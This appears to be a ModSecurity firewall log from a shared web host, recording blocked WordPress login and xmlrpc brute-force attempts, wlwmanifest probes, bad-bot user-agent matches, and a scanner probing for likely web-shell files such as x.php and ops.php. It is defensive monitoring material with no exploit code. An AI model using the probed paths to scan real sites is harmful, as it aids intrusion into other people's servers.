[Tue May 26 18:44:13.103766 2026] [security2:error] [pid 1025417:tid 1025574] [client 185.191.171.8:20878] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/event/list/"] [unique_id "ahWcpVHbArxonFeMXvQNlgAAABs"]
[Tue May 26 18:44:13.674891 2026] [security2:error] [pid 1025417:tid 1025630] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcpVHbArxonFeMXvQNnwAAAFM"]
[Tue May 26 18:44:14.979487 2026] [security2:error] [pid 1025417:tid 1025615] [client 113.162.198.220:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcplHbArxonFeMXvQNuwAAAEQ"]
[Tue May 26 18:44:16.968559 2026] [security2:error] [pid 1025417:tid 1025604] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcqFHbArxonFeMXvQN8gAAADk"]
[Tue May 26 18:44:18.429124 2026] [security2:error] [pid 1025417:tid 1025586] [client 2.58.56.163:62974] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWcqlHbArxonFeMXvQONAAAACc"]
[Tue May 26 18:44:18.880283 2026] [security2:error] [pid 1025417:tid 1025650] [client 2.58.56.163:54063] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.56.58.2.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "consola.jhonweb.com"] [uri "/xmlrpc.php"] [unique_id "ahWcqlHbArxonFeMXvQOQQAAAGc"]
[Tue May 26 18:44:19.170701 2026] [security2:error] [pid 1025417:tid 1025662] [client 2.58.56.163:59008] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWcq1HbArxonFeMXvQOUAAAAHM"]
[Tue May 26 18:44:19.466893 2026] [security2:error] [pid 1025417:tid 1025624] [client 2.58.56.163:62667] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWcq1HbArxonFeMXvQOWwAAAE0"]
[Tue May 26 18:44:19.544797 2026] [security2:error] [pid 1025417:tid 1025673] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcq1HbArxonFeMXvQOTwAAAH4"]
[Tue May 26 18:44:19.775028 2026] [security2:error] [pid 1025417:tid 1025666] [client 2.58.56.163:50222] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWcq1HbArxonFeMXvQOZQAAAHc"]
[Tue May 26 18:44:19.871485 2026] [security2:error] [pid 1025417:tid 1025567] [client 124.43.5.103:53790] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcq1HbArxonFeMXvQObwAAABQ"]
[Tue May 26 18:44:19.871609 2026] [security2:error] [pid 1025417:tid 1025567] [client 124.43.5.103:53790] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWcq1HbArxonFeMXvQObwAAABQ"]
[Tue May 26 18:44:20.086855 2026] [security2:error] [pid 1025417:tid 1025620] [client 2.58.56.163:53081] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWcrFHbArxonFeMXvQOdgAAAEk"]
[Tue May 26 18:44:20.393376 2026] [security2:error] [pid 1025417:tid 1025650] [client 2.58.56.163:57274] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWcrFHbArxonFeMXvQOfQAAAGc"]
[Tue May 26 18:44:20.684188 2026] [security2:error] [pid 1025417:tid 1025630] [client 2.58.56.163:60571] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWcrFHbArxonFeMXvQOiwAAAFM"]
[Tue May 26 18:44:20.988350 2026] [security2:error] [pid 1025417:tid 1025646] [client 2.58.56.163:64031] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWcrFHbArxonFeMXvQOmQAAAGM"]
[Tue May 26 18:44:21.285367 2026] [security2:error] [pid 1025417:tid 1025642] [client 2.58.56.163:50974] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWcrVHbArxonFeMXvQOowAAAF8"]
[Tue May 26 18:44:21.506928 2026] [security2:error] [pid 1025417:tid 1025493] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcrVHbArxonFeMXvQOrAAAcEs"]
[Tue May 26 18:44:21.507113 2026] [security2:error] [pid 1025417:tid 1025659] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcrVHbArxonFeMXvQOrAAAcEs"]
[Tue May 26 18:44:21.516117 2026] [security2:error] [pid 1025417:tid 1025637] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcrVHbArxonFeMXvQOoAAAAFo"]
[Tue May 26 18:44:21.578022 2026] [security2:error] [pid 1025417:tid 1025572] [client 2.58.56.163:55398] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahWcrVHbArxonFeMXvQOsgAAABk"]
[Tue May 26 18:44:21.873817 2026] [security2:error] [pid 1025417:tid 1025597] [client 2.58.56.163:59253] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWcrVHbArxonFeMXvQOtwAAADI"]
[Tue May 26 18:44:22.184011 2026] [security2:error] [pid 1025417:tid 1025655] [client 2.58.56.163:62720] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWcrlHbArxonFeMXvQOxAAAAGw"]
[Tue May 26 18:44:22.480173 2026] [security2:error] [pid 1025417:tid 1025551] [client 2.58.56.163:49542] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWcrlHbArxonFeMXvQOywAAAAQ"]
[Tue May 26 18:44:22.782846 2026] [security2:error] [pid 1025417:tid 1025617] [client 2.58.56.163:53229] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWcrlHbArxonFeMXvQOzwAAAEY"]
[Tue May 26 18:44:23.078863 2026] [security2:error] [pid 1025417:tid 1025596] [client 2.58.56.163:56273] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "consola.jhonweb.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWcr1HbArxonFeMXvQO1AAAADE"]
[Tue May 26 18:44:23.868571 2026] [security2:error] [pid 1025417:tid 1025504] [remote 162.240.52.198:55250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWcr1HbArxonFeMXvQO5wAATlY"]
[Tue May 26 18:44:24.089201 2026] [security2:error] [pid 1025417:tid 1025505] [remote 5.78.119.122:50684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWcr1HbArxonFeMXvQO6wAAeFc"]
[Tue May 26 18:44:24.292020 2026] [security2:error] [pid 1025417:tid 1025506] [remote 162.240.52.198:55250] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 198.52.240.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWcsFHbArxonFeMXvQO-AAAYFg"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:44:24.709039 2026] [security2:error] [pid 1025417:tid 1025651] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcsFHbArxonFeMXvQO-wAAAGg"]
[Tue May 26 18:44:26.839574 2026] [security2:error] [pid 1025417:tid 1025521] [remote 152.53.111.131:39614] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 131.111.53.152.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcslHbArxonFeMXvQPOAAAa2c"]
[Tue May 26 18:44:27.425375 2026] [security2:error] [pid 1025417:tid 1025661] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWcs1HbArxonFeMXvQPRAAAAHI"]
[Tue May 26 18:44:27.526229 2026] [security2:error] [pid 1025417:tid 1025589] [client 20.195.199.65:57270] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWcs1HbArxonFeMXvQPSwAAACo"]
[Tue May 26 18:44:27.526394 2026] [security2:error] [pid 1025417:tid 1025589] [client 20.195.199.65:57270] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWcs1HbArxonFeMXvQPSwAAACo"]
[Tue May 26 18:44:28.720008 2026] [security2:error] [pid 1025417:tid 1025604] [client 20.195.199.65:59772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/x.php"] [unique_id "ahWctFHbArxonFeMXvQPaAAAADk"]
[Tue May 26 18:44:28.720108 2026] [security2:error] [pid 1025417:tid 1025604] [client 20.195.199.65:59772] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/x.php"] [unique_id "ahWctFHbArxonFeMXvQPaAAAADk"]
[Tue May 26 18:44:29.562984 2026] [security2:error] [pid 1025417:tid 1025525] [remote 162.214.206.32:51962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWctVHbArxonFeMXvQPdQAAQ2s"]
[Tue May 26 18:44:29.729696 2026] [security2:error] [pid 1025417:tid 1025420] [remote 162.214.206.32:51962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 32.206.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWctVHbArxonFeMXvQPgwAAKgI"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:44:30.017706 2026] [security2:error] [pid 1025417:tid 1025615] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWctVHbArxonFeMXvQPfwAAAEQ"]
[Tue May 26 18:44:30.288774 2026] [security2:error] [pid 1025417:tid 1025575] [client 20.195.199.65:57239] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/201.php"] [unique_id "ahWctlHbArxonFeMXvQPkAAAABw"]
[Tue May 26 18:44:30.288875 2026] [security2:error] [pid 1025417:tid 1025575] [client 20.195.199.65:57239] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/201.php"] [unique_id "ahWctlHbArxonFeMXvQPkAAAABw"]
[Tue May 26 18:44:30.592431 2026] [security2:error] [pid 1025417:tid 1025593] [client 124.43.5.103:39027] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWctlHbArxonFeMXvQPlgAAAC4"]
[Tue May 26 18:44:30.592833 2026] [security2:error] [pid 1025417:tid 1025593] [client 124.43.5.103:39027] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWctlHbArxonFeMXvQPlgAAAC4"]
[Tue May 26 18:44:30.970666 2026] [security2:error] [pid 1025417:tid 1025534] [remote 162.214.79.109:40622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 109.79.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWctlHbArxonFeMXvQPmgAASXQ"]
[Tue May 26 18:44:31.009889 2026] [security2:error] [pid 1025417:tid 1025536] [remote 103.95.119.103:47778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.119.95.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWctlHbArxonFeMXvQPngAAQXY"]
[Tue May 26 18:44:31.178934 2026] [security2:error] [pid 1025417:tid 1025533] [remote 162.214.79.109:40622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 109.79.214.162.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWct1HbArxonFeMXvQPrgAAbHM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:44:32.214526 2026] [security2:error] [pid 1025417:tid 1025532] [remote 185.71.88.234:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 234.88.71.185.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcuFHbArxonFeMXvQPxQAACHI"]
[Tue May 26 18:44:32.214714 2026] [security2:error] [pid 1025417:tid 1025555] [client 185.71.88.234:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ndequipments.com"] [uri "/xmlrpc.php"] [unique_id "ahWcuFHbArxonFeMXvQPxQAACHI"]
[Tue May 26 18:44:32.321953 2026] [security2:error] [pid 1025417:tid 1025646] [client 20.195.199.65:47241] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/ops.php"] [unique_id "ahWcuFHbArxonFeMXvQPzAAAAGM"]
[Tue May 26 18:44:32.322054 2026] [security2:error] [pid 1025417:tid 1025646] [client 20.195.199.65:47241] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/ops.php"] [unique_id "ahWcuFHbArxonFeMXvQPzAAAAGM"]
[Tue May 26 18:44:32.363886 2026] [security2:error] [pid 1025417:tid 1025568] [client 216.244.66.241:40308] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWcuFHbArxonFeMXvQPzQAAABU"]
[Tue May 26 18:44:32.363998 2026] [security2:error] [pid 1025417:tid 1025568] [client 216.244.66.241:40308] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWcuFHbArxonFeMXvQPzQAAABU"]
[Tue May 26 18:44:32.364202 2026] [security2:error] [pid 1025417:tid 1025608] [client 216.244.66.241:40302] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWcuFHbArxonFeMXvQPzgAAAD0"]
[Tue May 26 18:44:32.364321 2026] [security2:error] [pid 1025417:tid 1025608] [client 216.244.66.241:40302] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.ghanemgh.com"] [uri "/robots.txt"] [unique_id "ahWcuFHbArxonFeMXvQPzgAAAD0"]
[Tue May 26 18:44:33.498223 2026] [security2:error] [pid 1025417:tid 1025642] [client 20.195.199.65:39804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/samll.php"] [unique_id "ahWcuVHbArxonFeMXvQP8gAAAF8"]
[Tue May 26 18:44:33.498353 2026] [security2:error] [pid 1025417:tid 1025642] [client 20.195.199.65:39804] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/samll.php"] [unique_id "ahWcuVHbArxonFeMXvQP8gAAAF8"]
[Tue May 26 18:44:34.072671 2026] [security2:error] [pid 1025417:tid 1025428] [remote 103.117.180.182:33812] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 182.180.117.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWcuVHbArxonFeMXvQP9QAABgo"]
[Tue May 26 18:44:34.751980 2026] [security2:error] [pid 1025417:tid 1025585] [client 20.195.199.65:41268] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 65.199.195.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "autoconfig.obinnawrites.com"] [uri "/ingfo.php"] [unique_id "ahWculHbArxonFeMXvQQCgAAACY"]
[Tue May 26 18:44:34.752076 2026] [security2:error] [pid 1025417:tid 1025585] [client 20.195.199.65:41268] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "autoconfig.obinnawrites.com"] [uri "/ingfo.php"] [unique_id "ahWculHbArxonFeMXvQQCgAAACY"]
[Tue May 26 18:44:35.282637 2026] [security2:error] [pid 1025417:tid 1025622] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWculHbArxonFeMXvQQDQAAAEs"]
[Tue May 26 18:44:35.336027 2026] [security2:error] [pid 1025417:tid 1025432] [remote 92.117.185.70:60427] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.185.117.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWcu1HbArxonFeMXvQQFgAALw4"]
